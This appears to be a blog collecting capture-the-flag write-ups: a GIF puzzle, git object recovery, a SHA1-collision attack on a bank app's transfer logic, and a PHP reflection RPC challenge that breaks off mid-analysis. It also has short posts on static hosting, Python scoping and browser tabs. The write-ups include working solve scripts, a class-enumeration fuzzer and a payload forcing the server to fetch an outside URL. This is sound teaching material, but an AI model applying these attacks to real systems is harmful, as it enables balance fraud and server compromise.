The Redacted-Puzzle challenge

The challenge prompt says "Everything you need is in this file." and provides a gif.

The gif appears all black so I opened it up in a Jupyter notebook with the Pillow library.

I first looked at the number of frames and if the image was animated:

from PIL import Image
im = Image.open('redacted-puzzle.gif')
print im.is_animated, im.n_frames

True 35

To get a quick idea of the variety between the frames, I hashed each individual frame:

import hashlib
ba = []
for frame in range(im.n_frames):
    im.seek(frame)
    ba.append(im.tobytes())
    print hashlib.md5(ba[-1]).hexdigest(), len(ba[-1]), hashlib.md5(''.join(chr(x) for x in im.getpalette())).hexdigest()

e176bcf3e8b281e91836b1cb2d430405 921600 60a44dc3832c9d6881f7d93298eeb341
acaac3e8a8dbe0531c8dd20146eb66af 921600 60a44dc3832c9d6881f7d93298eeb341
052381a58aacc14ac056f08eafcc13af 921600 60a44dc3832c9d6881f7d93298eeb341
d10c97718cd77ebef4df51b686ca5515 921600 60a44dc3832c9d6881f7d93298eeb341
....

This told me that all the frames where the same size, and all were different.

Taking a look at the frames, I realized they were in palette mode, and therefore each byte mapped to a pixel in the image, and the color was determined by the palette.

I converted one of the frames to from pixel to RGBA, and looked at the colors, which are all black or very close to it.

m = Image.frombytes('P', (1280,720), ba[0]).convert(mode='RGBA')
m.getcolors()

[(6090, (1, 1, 1, 255)), (73112, (2, 2, 2, 255)), (842398, (0, 0, 0, 255))]

I put some code together to change the colors and recreate the gif frame by frame. From this we can see various shapes moving around the image.

import numpy as np
from PIL import ImageFont, ImageDraw
new_colors = []
for i, b in enumerate(ba):
    m = Image.frombytes('P', (1280,720), b).convert(mode='RGBA')
    data = np.array(m)
    r,g,b,a = data.T
    white = (r == 0 ) & (b == 0) & (g == 0)
    red = (r == 1 ) & (b == 1) & (g == 1)
    green = (r == 2) & (b == 2) & (g == 2)
    data[..., :-1][white.T] = (255,255,255)
    data[..., :-1][red.T] = (255,0,0)
    data[..., :-1][green.T] = (0,255,0)
    im3 = Image.fromarray(data)
    draw = ImageDraw.Draw(im3)
    draw.text((10,10), 'Frame: {0}'.format(i), fill='green')
    new_colors.append(im3)
new_colors[0].save('new_redacted.gif', save_all=True, append_images=new_colors[1:], duration=500, loop=0)

I blended a few of the images together, and saw a distinct hexagonal shape.

At this point I wasn't quite sure what to do next. Looking at the alphabet, I noticed there were 32 characters, and I was thinking about base32 encoding. From the octagon, I figured it'd be possible to represent a byte, where each corner of the octagon was a bit, and so the image above, if just the black trapezoid is considered in the image above, the bit patten might read 00001111. There are 35 frames, so 35 bytes = 35 * 8 = 280 bytes. 280 can be evenly divided by 5 so if my base32 theory is correct, there could be a 56 character encoded message.

So I opened the above image in GIMP and circled all the corners and saved the just the circles on a transparent background.

I put a star where to start from, and then started putting a 0 or 1 based on if the shape touched or got close to the circle.

I saved off my guesses in a file called numbers.txt. Even though I picked a consistent spot to record the pattern, I didn't know if the location I chose was the correct first bit location. So I wrote a script which would take all 35 binary groupings, and rotate each one by place. I would then merge all 35 into one string, and use groups of 5 bits to determine a number, which would make the offset into the alphabet shown in the image.

alpha = '+-=ABCDEFGHIJKLMNOPQRSTUVWXYZ_{}'
def rotate(x, i):
    return x[i:] + x[:i]
with open('numbers.txt') as f:
    nums = [ x.split(' ')[0] for x in f.read().split('\n') if x]
for rotate_level in range(8):
    p = ''.join(rotate(x, rotate_level) for x in nums)
    chunks = [ p[i:i+5] for i in range(0,len(p), 5)]
    print rotate_level, ''.join(alpha[int(x,2)] for x in chunks)

0 BMJAQBI-G{F=JL-_B-CQP-V=XISQLR{FIW-J-UAHQSQUPA{LZQOYBA{M
1 FXVUBF{=QVNRVZAXF=IEBANBRUIT_GROUP=FALLREMEMBER_WEATHER}
2 OOO{FORCES-GOVERN+T{FE+FGLU_VQGAMBBNDZ_GLXL{HM-YPLEZRM-}
3 AEAJQA+IMH=AANMG+CKJPL+NPWMYQDPD{FG+KWPQ_N_ZT{ATBZMWH{A{
4 DHDWDDFT{NBTC+{Q+HXGDZ-+CT}EDKJJZRP+WQKDYCYGMZEJGV}=UZEZ
5 JNKPLJOJ_BGJF-_E+ORPMV=+IG{{JXNWWKB-ODXKTMT=}VLWQO{CKVMW
6 W+YBZW=VXJPFPAPM-AGB_NJ+TQ_JYS-PP{FA+KZXJ}JS_N_QEEZHWN}Q
7 PCTGWPCNR_B-DEB{==PWW+V-KEXWUHIBCZNT+YOSWXWYW-YELIVSQ-}E

Offset 2 looks really close, we see the start of the flag OOO{ and it looks like real text and not gibberish. But after 16 or so characters it starts to look like gibberish again. But, The end of offset 1 looks really promising.

I double checked my binary codes against the images noticed that the images periodically fell out of sync with my circles, and that I was guessing for many of them.

I used the following to regenerate all of the frames with a -1 degree rotation and then made a new list of binary codes.

import numpy as np
from PIL import ImageFilter
from IPython import display
overlayed = []
recolored = []
lay = Image.open('layer2.png')
for i in range(len(ba)):
    m = Image.frombytes('P', (1280,720), ba[i]).convert(mode='RGBA')
    print i, 'Line {0}'.format(i+1)
    data = np.array(m)
    r,g,b,a = data.T
    black = (r == 0 ) & (b == 0) & (g == 0)
    b2 = (r == 1 ) & (b == 1) & (g == 1)
    data[..., :-1][black.T] = (255,255,255)
    data[..., :-1][b2.T] = (255,255,255)
    im3 = Image.fromarray(data)
    im3 = im3.rotate(-i)
    recolored.append(im3.copy())
    im3.alpha_composite(lay)
    overlayed.append(im3)
    display.display(im3)

That produced the following with rotation level 2 putting out the flag:

0 BMJAQBI-G{F=JL-_B-CWV-V=KEXWUHIBCZNT+YOSWXWYW-YELIVSQ-}E
1 FXVUBF{=QVNRVZAXF=IAPANBXISQLR{FIW-J-UAHQSQUPA{LZQOYBA{M
2 OOO{FORCES-GOVERN+TUBE+FRUIT_GROUP=FALLREMEMBER_WEATHER}
3 AEAJQA+IMH=AANMG+CKLFL+NGLU_VQGAMBBNDZ_GLXL{HM-YPLEZRM-}
4 DHDWDDFT{NBTC+{Q+HXJPZ-+PWMYQDPD{FG+KWPQ_N_ZT{ATBZMWH{A{
5 JNKPLJOJ_BGJF-_E+ORWEV=+CT}EDKJJZRP+WQKDYCYGMZEJGV}=UZEZ
6 W+YBZW=VXJPFPAPM-AG=MNJ+IG{{JXNWWKB-ODXKTMT=}VLWQO{CKVMW
7 PCTGWPCNR_B-DEB{==PR_+V-TQ_JYS-PP{FA+KZXJ}JS_N_QEEZHWN}Q

Yesterday I participated in the TSG CTF and I'll be posting a few of the challenges and solutions to the blog.

The Obliterated File challenges

Both challenges involve the use of git. I have some familiarity working with the internals of git so I knew enough to start throwing commands together, even if I didn't quite understand what exactly I was doing.

The first problem has the prompt

Working on making a problem of TSG CTF, I noticed that I have staged and committed the flag file by mistake before I knew it. I googled and found the following commands, so I'm not sure but anyway typed them. It should be ok, right?

$ git filter-branch --index-filter "git rm -f --ignore-unmatch problem/flag" --prune-empty -- --all
$ git reflog expire --expire=now --all
$ git gc --aggressive --prune=now

Another challenge, Obliterated File Again was was later released as an unintentional solution was discovered for the original challenge. I ended up solving both challenges in the same way.

I've had some experience working through git plumbing commands in the past. So without really knowing what I was looking for, I started trying commands.

user@box:/tmp/ob/easy_web$ find .git/objects/ -type f
.git/objects/ba/46709ec62fd916b29f17c5e9fd2fa99b71027c
.git/objects/fa/e323e2976c63f9aab36283ded3a205b02cd8da
.git/objects/cd/50304fc39f8c0fbc7ad062ecb9a940f3baed29
.git/objects/info/packs
.git/objects/pack/pack-358c51ff6239c4616442ad260a7f71391fec6fc2.idx
.git/objects/pack/pack-358c51ff6239c4616442ad260a7f71391fec6fc2.pack
.git/objects/5d/04bb5c39d8821c57d6e109088caefbdfd9660b
.git/objects/26/6f4148e4cf37bdbfb57da379ea49b2f106e6b2
.git/objects/4e/48cb9537172cfcf4174c999ee409ca70139c3d
.git/objects/4e/342ba6d191971197bb40023855b53a0155060b
.git/objects/50/935b0c64743459d3ffdfabb31229af867b949e
.git/objects/8e/497982ba717ee0fe21acd4d6a1beb74be0f90f
.git/objects/87/16dd0de5702371cc61c4627865bcaf16ddb448

The pack file sticks out, and I know it can be used to house more git objects so I found the documentation which led me to try the verify-pack command.

user@box:/tmp/ob/easy_web$ git verify-pack -v .git/objects/pack/pack-358c51ff6239c4616442ad260a7f71391fec6fc2.pack
d516014b8de3f20d473f2adca1713337095c7873 commit 217 153 12
f1d1f81fb5444ec4d40736104d682b43611c66f5 commit 217 151 165
98d396f94fb23e9e0fb317aa041ca02691f7ec8b commit 218 156 316
...truncated ...

72e3d57df672e811ef56d4fa993a71da33a1de91 blob   59 67 9622
207cef168362ac985a373f49fdbcf1d29035b6fb tree   64 79 9689 2 91a3b5d486e8cce94c981e459db47a2fa4497e1b
non delta: 59 objects
chain length = 1: 21 objects
chain length = 2: 12 objects
chain length = 3: 5 objects
chain length = 4: 1 object
chain length = 5: 1 object
.git/objects/pack/pack-358c51ff6239c4616442ad260a7f71391fec6fc2.pack: ok

I wanted to cat-file the hashes and save the output, so I put together a basic script in python. The purpose of this code is to take a hash as a command line argument, and then run git cat-file -p <hash> and save off the output. There is probably a sneaky way to do this in bash, but python worked just fine.

The contents of fetch.py is shown below.

#!/usr/bin/python
import argparse
import subprocess

def fetch(hash):
    try:
        output = subprocess.check_output(["git", "cat-file", "-p", hash], stderr=subprocess.STDOUT)
    except Exception as e:
        if len(e.output):
            output = e.output
        else:
            output = str(e)
    with open('./output/' + hash, 'w') as f:
        f.write(output)

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('hash')
    args = parser.parse_args()

    fetch(args.hash)
if __name__ == '__main__':
    main()

I then grepped all of the hashes out of the packfile and extracted the contents.

user@box:/tmp/ob/easy_web$ git verify-pack -v .git/objects/pack/pack-358c51ff6239c4616442ad260a7f71391fec6fc2.pack |\
  grep -Po '[a-f0-9]{40}'| \
  sort|uniq| xargs -I{} python fetch.py {}
[code]

[code]
user@box:/tmp/ob/easy_web$ grep -rni flag output/
output/02d365359d84a5d4f4317fa3549fe073a024c502:5:flag = File.open("./flag", "r") do |f|
output/02d365359d84a5d4f4317fa3549fe073a024c502:14:    db.exec "INSERT INTO accounts VALUES ('admin', '#{flag}');"
output/e518bb214047db324b2e9b09d5617d84c6cc4ebf:1:100644 blob 111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc  flag
output/6eec6e57cc9eb5aa67f09fb73bdb3b933d7fdded:5:The flag is admin's password.
output/c9319554ea383df062bafa9e96915ffe62136457:3:100644 blob 111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc flag
output/b8b02f91a5b2407cb4014c81440ce7620c4830bc:3:100644 blob 111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc flag
output/ebc4754f23719c17eedf24af0187be86b52e71d2:5:flag = File.open("./flag", "r") do |f|
output/ebc4754f23719c17eedf24af0187be86b52e71d2:14:    db.exec "INSERT INTO accounts VALUES ('admin', '#{flag}');"
output/8ce8f78879f344df4e079a81048e7e18fdb29fed:5:100644 blob 111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc  flag

Seeing the hash for the flag file, I started looking at that file

user@box:/tmp/ob/easy_web$ file output/111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc
output/111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc: zlib compressed data

A google search for bash zlib decompression returned this answer on stack overflow.

user@box:/tmp/ob/easy_web$ printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" |cat - output/111eb967d40ae9bc7b2d16bbab7aaac5746ba1dc|gzip -dc
TSGCTF{$_git_update-ref_-d_refs/original/refs/heads/master}
gzip: stdin: unexpected end of file

Obliterated File Again

I started off looking at the packfile again, and the problem had the same solution.

user@box:/tmp/ob/easy_web$ ls -l ./.git/objects/pack/*
-r--r--r-- 1 alex alex  3900 May  4 07:57 ./.git/objects/pack/pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.idx
-r--r--r-- 1 alex alex 10125 May  4 07:57 ./.git/objects/pack/pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.pack

user@box:/tmp/ob/easy_web$ git verify-pack -v .git/objects/pack/pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.pack |\
  grep -Po '[a-f0-9]{40}'|\
  sort|uniq| xargs -I{} python fetch.py {}

user@box:/tmp/ob/easy_web$ grep -rni flag output/*
output/02d365359d84a5d4f4317fa3549fe073a024c502:5:flag = File.open("./flag", "r") do |f|
output/02d365359d84a5d4f4317fa3549fe073a024c502:14:    db.exec "INSERT INTO accounts VALUES ('admin', '#{flag}');"
output/1f34928d090b69867f664dcbef276d53a29483cc:3:100644 blob c1e375244c834c08d537d564e2763a7b92d5f9a8  flag
output/2aea982ed4eb63a835ce71322379720fb45e3a7a:2:100644 blob c1e375244c834c08d537d564e2763a7b92d5f9a8  flag
output/6eec6e57cc9eb5aa67f09fb73bdb3b933d7fdded:5:The flag is admin's password.
output/d5fe4dc31680a0c12730b4599ecccb369b6a0a14:3:100644 blob c1e375244c834c08d537d564e2763a7b92d5f9a8  flag
output/ebc4754f23719c17eedf24af0187be86b52e71d2:5:flag = File.open("./flag", "r") do |f|
output/ebc4754f23719c17eedf24af0187be86b52e71d2:14:    db.exec "INSERT INTO accounts VALUES ('admin', '#{flag}');"
output/ff591ccbfb2cf72a371008a82f4210209797584f:5:100644 blob c1e375244c834c08d537d564e2763a7b92d5f9a8  flag

user@box:/tmp/ob/easy_web$ file output/c1e375244c834c08d537d564e2763a7b92d5f9a8
output/c1e375244c834c08d537d564e2763a7b92d5f9a8: zlib compressed data
user@box:/tmp/ob/easy_web$ printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" |cat - output/c1e375244c834c08d537d564e2763a7b92d5f9a8|gzip -dc
TSGCTF{$_git_update-ref_-d_refs/original/refs/heads/master_S0rry_f0r_m4king_4_m1st4k3_0n_th1s_pr0bl3m}
gzip: stdin: unexpected end of file
user@box:/tmp/ob/easy_web$

Yesterday I participated in the TSG CTF and I'll be posting a few of the challenges and solutions to the blog.

The Secure Bank challenge

The prompt of the challenge is:

I came up with more secure technique to store user list. Even if a cracker could dump it, now it should be of little value!!!

The website links to source code and logging in shows that it is a banking application.

Looking at the source file shows that in order to get the flag the balance of the account should be greater than or equal to 10 billion.

get '/api/flag' do
  return err(401, 'login first') unless user = session[:user]

  hashed_user = STRETCH.times.inject(user){|s| Digest::SHA1.hexdigest(s)}

  res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_user
  row = res.next
  balance = row && row[0]
  res.close

  return err(401, 'login first') unless balance
  return err(403, 'earn more coins!!!') unless balance >= 10_000_000_000

  json({flag: IO.binread('data/flag.txt')})
end

Before I get into how to solve the challenge, if you would like to try it on your own, you can build the server and run the challenge yourself by following the README file in this github repo

Solving the Challenge

Poking around the website itself, I note the following: - New accounts are issued 100 coins - Users can transfer coins to another account

I could register 100 million accounts and have them all transfer coins to a single account. But that doesn't feel practical.

I decided to take a look at the transfer function to see if I could spot any vulnerabilities.

post '/api/transfer' do
  return err(401, 'login first') unless src = session[:user]

  return err(400, 'bad request') unless dst = params[:target] and String === dst and dst != src
  return err(400, 'bad request') unless amount = params[:amount] and String === amount
  return err(400, 'bad request') unless amount = amount.to_i and amount > 0

  sleep 1

  hashed_src = STRETCH.times.inject(src){|s| Digest::SHA1.hexdigest(s)}
  hashed_dst = STRETCH.times.inject(dst){|s| Digest::SHA1.hexdigest(s)}

  res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_src
  row = res.next
  balance_src = row && row[0]
  res.close
  return err(422, 'no enough coins') unless balance_src >= amount

  res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_dst
  row = res.next
  balance_dst = row && row[0]
  res.close
  return err(422, 'no such user') unless balance_dst

  balance_src -= amount
  balance_dst += amount

  DB.execute 'UPDATE account SET balance = ?  WHERE user = ?', balance_src, hashed_src
  DB.execute 'UPDATE account SET balance = ?  WHERE user = ?', balance_dst, hashed_dst

  json({amount: amount, balance: balance_src})
end

The api takes two arguments, a destination user account and an amount.

The amount to transfer must be greater than 0 and the usernames can not be the same

The usernames of the sender and the destination are both hashed, and the hashes are used to locate the records of the users in the database.

Seeing the dst != src validation made me realize that if the usernames where the same the transfer would give extra coins. This is because the new amount for the destination is calculated using values obtained before the coins where subtracted from the sender.

The user's data is obtained from the database by the SHA1 hash of the user ID. So if we can get two different usernames but the same hash, we can add coins to our account and overwrite the effects of subtracting.

SHA1 is vulnerable to collisions, and researchers have figured out how to generate the same SHA1 hash from two different byte sequences.

This website provides a SHA1 collider. You can specify two files and it will return two PDFs with different data but each with the same SHA1 hash.

The first thing I wanted to do was test if the collision would work. I only have a passing knowledge of ruby and sinatra, so I wanted to see what the output of a collision would look like.

I spun up a docker instance of the ruby server and modified the source to add the following to the /api/register logic.

md5_user = Digest::MD5.hexdigest(user)
puts  "register user SHA1 #{hashed_user} MD5 #{md5_user}"

Next I needed usernames to test with.

I uploaded two files, a.jpg and b.jpg which had 4 A and 4 B characters respectively to the SHA1 collider. I then loaded the files in python and chopped them from the end of the file until the hashes no longer matched. This left 2 different sequences of 320 bytes with the same SHA1 hash.

I wrote python to register both byte sequences as usernames on the modified server, and watched the output.

The server had the following output, proving the two users have the same SHA1 hash.

127.0.0.1 - - [05/May/2019:22:30:33 +0000] "GET /index.html HTTP/1.1" 200 5341 0.0220
register user SHA1 ebbc34e8a20fa2d296fb09d1be253250d73a0720 MD5 7c2f61965501afba4ff7e84ee2c91853
127.0.0.1 - - [05/May/2019:22:30:34 +0000] "POST /api/register HTTP/1.1" 200 - 1.0135
register user SHA1 ebbc34e8a20fa2d296fb09d1be253250d73a0720 MD5 e427eb5d9a171094e7ba99b1e1d502b3

The full script of the attack can be seen in the solution file but I've taken the important parts and commented on them below.

The script works by registering a username (ua) and then transferring all available coins to ub. Because ua has the same hash as ub the coins are actually transfered to the ua user.

def run_attack(base_url):
    # We generate 4 random bytes to add at the of the usernames. This
    # lets us rerun this script and not collide with a previously used
    # username. We double check that the hashes are the same.
    seed = secrets.token_bytes(4)
    ua, ub = USER_A + seed, USER_B + seed
    h1, h2 = hashlib.sha1(ua).hexdigest(), hashlib.sha1(ub).hexdigest()
    assert h1 == h2

    # Create a Session object, which will retain cookie values. Then
    # register and login with our user.
    s = requests.Session()
    s.get(index_url)
    s.post(register_url, data={"user":ua, "pass": 'a'*20})
    s.post(login_url, data={"user":ua, "pass": 'a'*20})

    # Get the balance of our user
    r = s.post(balance_url, data={})
    balance = r.json()['balance'] if 'balance' in r.json() else None
    while balance is not None and balance < 10000000000:
        if balance is None:
            print('Could not read balance, exiting')
            return
        # Transfer all of the money in ua's account to ub
        s.post(transfer_url, data={"amount":str(balance), "target": ub})
        r = s.post(balance_url, data={})
        balance = r.json()['balance'] if 'balance' in r.json() else None
        print(balance)

    r = s.get(flag_url)
    print(r.json())

$ python solve.py http://34.85.75.40:19292
200
400
800
1600
3200
6400
12800
25600
51200
102400
204800
409600
819200
1638400
3276800
6553600
13107200
26214400
52428800
104857600
209715200
419430400
838860800
1677721600
3355443200
6710886400
13421772800
{'flag': 'TSGCTF{H4SH_FUNCTION_1S_NOT_INJ3C71V3... :(}\n'}

I have updated the architecture of the website. Hopefully, nothing has changed and no one will notice the difference. The website now runs inside Amazon S3 and is served by CloudFront. A git repository stores my posts and when that repository is updated, a web hook triggers a lambda function which executes habu and syncs the files.

Why Make My Own Platform?

There are lots of solutions when it comes to making a website. From using a full service like Medium, hosted WordPress, to more customizable, yet still free, services like GitHub Pages. But even with all of these platforms available, I still wanted the control of hosting my own solution.

Back when I started this website, it was hosted on WordPress on a cheap VPS provider. After a while I got tired of having to ensure WordPress was always up to date and moved to a static website generated by habu. I customized the code a good bit to get the features I wanted, and set up a basic nginx static website. But after getting a Chromebook, I got really tired of having to have a full python environment in order to make posts to the website. Additionally, I started getting more and more familiar with AWS services like Lambda and S3.

Using Lambda and S3 allows me to push a change to my git repository and have it automatically update the S3 bucket. I no longer have to maintain a python environment in order to generate the static HTML, and I can edit my repository from within the browser.

There are several frameworks that offer similar S3 static websites. One that I looked at was hugo-lambda which watches for uploaded Markdown files and generates the static HTML pages. It even comes with CloudFormation templates for generating IAM roles and S3 buckets, which can be a bit time consuming if you're setting it up by hand. But at the end of the day, I wanted the experience of configuring everything so that I would know how it all works.

How the Website Works

Principles

I had two major principles when creating the website. The first was that everything would be backed by source control. This included the lambda code and the posts of the website. The second major principle was that I didn't want to run any software locally. I can still write the posts in atom on my desktop, but I also have the option of using the web editor for my git repository.

Technical Details

An overview of the architecture is shown below.

The action starts when a commit is pushed into the git repository. The repository is configured to call a webhook that is tied to API Gateway. API Gateway passes the webhook request to a Lambda function which then parses that request and passes it to the habu and sync lambda functions. The first lambda function passes the repository name and commit to the habu and sync functions. Those functions must then go and fetch the tarball of the repository from the git server. Not shown is a separate lambda function called by both habu and sync that provides OAuth credentials for them to connect to the git server.

The habu function runs the habu static generation script, but ignores the static files. The sync function syncs the static files to the S3 bucket. This allows the two functions to run concurrently.

Once the files are located in the S3 bucket, CloudFront can serve the files. CloudFront has been configured to have 30 second TTLs on the caches of the html files (since they change on each post), but the static files have a longer TTL since they generally do not change and are larger in size.

Gotchas and Missing Features

Lambda Timeouts

Both the habu and sync lambda functions need to be set to timeout at 10-20 seconds instead of the default 3. Most of this time is not spent actually computing but transmitting the file to S3. Currently, every post is updated when a new post is added (because of the Recent Posts section). If generating all of the new posts starts to take too long, I'll consider modifying the Recent Posts section so when creating the new post so only it would need to be sent.

CloudFront's Caching

CloudFront's default caching levels makes it tricky to see changes in real time. There are two ways to deal with changes to the static website. You can invalidate the objects or you can set the cache TTL to a smaller time frame.

Moving and Deleting Resources in S3

The current sync mechanism that is in place only adds new files and does not concern itself with files that are moved or deleted. In practice this shouldn't matter too much but it does raise the likelihood of an image or other resource being used that may no longer be in place in the source.

Inefficiencies

Static resources are always synchronized between my git repository and S3, even if they already exist. I don't think it is worth fixing at the moment, but the solution is fairly straightforward. Using the list_objects method in boto3, I can get the MD5 hash (from the ETag) of each object already in the static directory and compare them with the files to sync, ignoring those with the same MD5.

Links I found helpful

• Host a Static Site on AWS, using S3 and CloudFront
• Configure a Custom Domain for CloudFront with HTTPS

Lets play a game

Lets suppose you have the following simple program:

from __future__ import print_function
import collections

Color = collections.namedtuple('Color',['name', 'hex_value'])

class User(object):
    def __init__(self):
        self.pallet = []
        self.pallet.append(Color('red','#ff0000'))
        self.pallet.append(Color('green','#00ff00'))
        self.pallet.append(Color('blue','#0000ff'))

    def has_color(self, color):
        find_color = filter(lambda x: x.name == color.name, [ color for color in self.pallet])
        found_colors = [x for x in find_color]
        if len(found_colors) > 0:
            return True
        return False

if __name__ == '__main__':
    user = User()
    print('User has red?', user.has_color(Color('red','#ff0000')) )
    print('User has white?', user.has_color(Color('white','#ffffff')) )

What is the value of the two print lines? From looking just at the init function and the print statements, we would expect an output of:

User has red? True
User has white? False

So is that what we get? It depends on which version of python you use, as you can see here:

$ python2 example1.py 
User has red? True
User has white? True

$ python3 example1.py 
User has red? True
User has white? False

List Comprehension Leakage

When using python2, the problem with our code is in the has_color method, and is the line:

find_color = filter(lambda x: x.name == color.name, [ color for color in self.pallet])

In python2, the expression [x for x in iterable] does not limit the scope of x to the list comprehension. So [color for color in self.pallet] will modify the argument color that was supplied to the method.

When I finally traced down a bug resulting from similar code, I couldn't believe it. It certainly is not very pythonic to have behavior like this. The form of the list comprehension implies a limited scope, and the benefit of being able to grab the last value from the iteration outweighs the risk of accidentaly trashing a local variable.

It turns out I was right to suspect this behavior, as many in the python community didn't like it either. In a blog post in 2010, Guido van Rossum, discussing this leak says:

This was an artifact of the original implementation of list comprehensions; it was one of Python's "dirty little secrets" for years. It started out as an intentional compromise to make list comprehensions blindingly fast, and while it was not a common pitfall for beginners, it definitely stung people occasionally. [...]

However, in Python 3, we decided to fix the "dirty little secret" of list comprehensions by using the same implementation strategy as for generator expressions. Thus, in Python 3, the above example (after modification to use print(x) :-) will print 'before', proving that the 'x' in the list comprehension temporarily shadows but does not override the 'x' in the surrounding scope.

Suggestion For List Comprehension with Python2

In order to avoid running into this mistake, I would suggest preceeding a variable in a list comprehension with tmp_. Thus our line above would become:

find_color = filter(lambda x: x.name == color.name, [ tmp_color for tmp_color in self.pallet])

This won't help you if you happen to already have a variable called tmp_something, but, chances are someone will ask you why you always preceed the variable with tmp_ and you'll get an opportunity to tell thim about this little caveat before it bites them.

I often start working on a project with a bit of research and end up filling up the entire top of Chrome with little tab icons.

I'll then need to work on something else, but I don't want the clutter of all the icons. Instead I want to move all these tabs into a new window. You can move one tab to a new window by clicking the tab, holding down, and dragging it down.

You can also select multiple tabs, and drag the whole group down. To select multiple tabs at once:

Select Multiple Tabs at Once from howtogeek.com

You can select several tabs at once with your mouse in many web browsers. Just hold down the Ctrl key (Command on a Mac) and click tabs in your web browser's tab bar. You can also hold Shift as you click tabs to select sequences of tabs. With multiple tabs selected, you can drag-and-drop them to group them together in a new browser window.

Last weekend I spent a little time with the YNOS web challenge that was apart of Insomni'hack CTF's 2015 Teaser. It is a PHP Web challenge worth 100 points.

Challenge Presentation

Apparently this website likes these stupid films. Pwn them and get the flag which is in a pretty obvious file in the webroot.

Browsing the website showed a small page with a few buttons at the top labeled "Home", "Artists", "Films", "Directors", and "Logout". There is also a form present called "Login" with "Username" and "Password" fields and a submit button.

First Impressions

The first thing I noticed was that none of the buttons were links. Instead they were all hooked up to javascript click events. The html of "Home" looked like this:

<li role="presentation" class="active" onclick="navigate('home')"><a href="#">Home</a></li>

The javascript of the page was defined as:

function navigate(tab) {
    req = $.ajax('INSO.RPC',{'type':'POST','data' : '{"c":{"name":"page"},"a":{"name":"render","params":{"name":"' + tab + '"}}}','processData':false,'contentType':'application/json'});
    req.done(function(response, textStatus, jqXHR) {
      $("#main").html(response);
    });
  }

  $(document).ready(function() {
    req = $.ajax('INSO.RPC',{'type':'POST','data' : '{"c":{"name":"page"},"a":{"name":"render","params":{"name":"home"}}}','processData':false,'contentType':'application/json'});
    req.done(function(response, textStatus, jqXHR) {
      $("#main").html(response);
    });
  });

Thus clicking "Home" would lead to a AJAX request of:

{"c":{"name":"page"},"a":{"name":"render","params":{"name":"home"}}}

Further, clicking the "Submit" button the "Login" form had an AJAX request of:

{"c":{"name":"user"},"a":{"name":"login","params":"user|pass"}}

This lead me to believe that the AJAX request to INSO.RPC was invoking some kind of reflection where the c class with the name name would be instantiated. Then the a "action" (method) would be called with parameters in params probably split into an array by separating at the pipe.

Fuzzing the API

Now I needed a way to test to see what I could do with this API. I started by trying to figure out if I could access arbitrary classes. I sent a request with the following payload containing what I could only assume was a made up class name that wouldn't be present in the PHP code:

{"c":{"name":"badclassafq"},"a":{"name":"login","params":"user|pass"}}

And I got a HTTP 500 status code back. Then I sent a request with stdClass since it is standard to PHP.

{"c":{"name":"stdClass"},"a":{"name":"login","params":"user|pass"}}

And I got a HTTP 200 status code. Now I had a way to determine what classes I could use.

Determining what Classes were Available

I whipped up a quick PHP script to give me all classes available in my own PHP environment. This would give me a starting point for what would be possible. Here was my test.php file:

<?php
var_dump(get_declared_classes());
?>

And some bash magic to get a file of classes:

php test.php |grep string|cut -d '"' -f 2 > classes.txt

I then used python and the requests module to enumerate the list to see what was available.

#!/usr/bin/python
import requests
import json
import logging

burp_proxie = {'http':'http://127.0.0.1:8080' }
base_url = 'http://ynos.teaser.insomnihack.ch'

def determine_classes(class_file_in="classes.txt", class_file_out="classes.json"):
    '''
    It appears the only way to get a 500 is to send a request with an invalid class name
    '''
    with open(class_file_in, 'r') as f:
        data = f.read()
    klasses = data.split('\n')
    results = {}
    for clas in klasses:
        logging.info('trying class: %s' % clas)
        resp = call_method(classname=clas)
        results[clas] = ( resp.status_code == 200 )
    with open(class_file_out,'wb') as f:
        json.dump(results,f,indent=2)

def call_method(classname="user",actionname="login",params="user|password"):
    rpc_url = base_url + '/INSO.RPC'
    data = '''{{"c":{{"name":"{classname}"}},"a":{{"name":"{actionname}","params":"{params}"}}}}'''.format(
        classname=classname,
        actionname=actionname,
        params=params
    )
    session = requests.Session()
    session.get(base_url, proxies=burp_proxie)
    resp = session.post(rpc_url, data=data, proxies=burp_proxie)
    return resp

if __name__ == '__main__':
    determine_classes()

Out of the 135 classes I sent, I got a list of 65 that were available. Of particular interest were

ArrayObject
RecursiveArrayIterator
ReflectionExtension
ReflectionFunction
ReflectionMethod
ReflectionObject
ReflectionParameter
ReflectionProperty
Reflection
ReflectionZendExtension
XMLReader

The Recursive classes are interesting because recursion allows us to use strings to create objects and then invoke methods of those objects, also specified as string. In fact, I suspected the back end code looked something like this:

<?php
if ( count($argv)== 4){
    $kl = $argv[1]; // $data["c"]["name"];
    $ka = $argv[2]; // $data["a"]["name"];
    $kp = $argv[3]; // $data["a"]["params"];
}
$b = new ReflectionMethod($kl,$ka);
echo($b->invokeArgs(new $kl, explode("|", $kp)));
echo("\n");
?>

Proving code execution

I wanted to confirm my ability to execute code from this API. I figured if I could get the code to call out to my website then I would confirm execution and wouldn't have to worry about how the server handles the result of a method call (does it return strings at all? what about other data?). I figured XMLReader might work since a URI can be specified for the open method. So I used XMLReader and sent the following:

{"c":{"name":"XMLReader"},"a":{"name":"open","params":"http://amccormack.net/xml.xml"}} 

Sure enough my apache log showed:

54.154.53.161 - - [12/Jan/2015:03:24:50 -0500] "GET /xml.xml HTTP/1.0" 404 3607 "-" "-"

Woohoo code execution! Now to make it arbitrary.

Getting Arbitrary Code Execution

I went down a lot of rabbit holes trying to get code execution to work. The biggest problem was that based on my understanding of what was happening behind the scenes: I had to invoke a class without any parameters in the constructor and then I got one method call with arbitrary parameters.

After a while I noticed something in the original API that I hadn't noticed before. Look at the difference between these two API requests:

{"c":{"name":"page"},"a":{"name":"render","params":{"name":"home"}}}    /*render page */
{"c":{"name":"user"},"a":{"name":"login","params":"username|password"}} /*login request*/

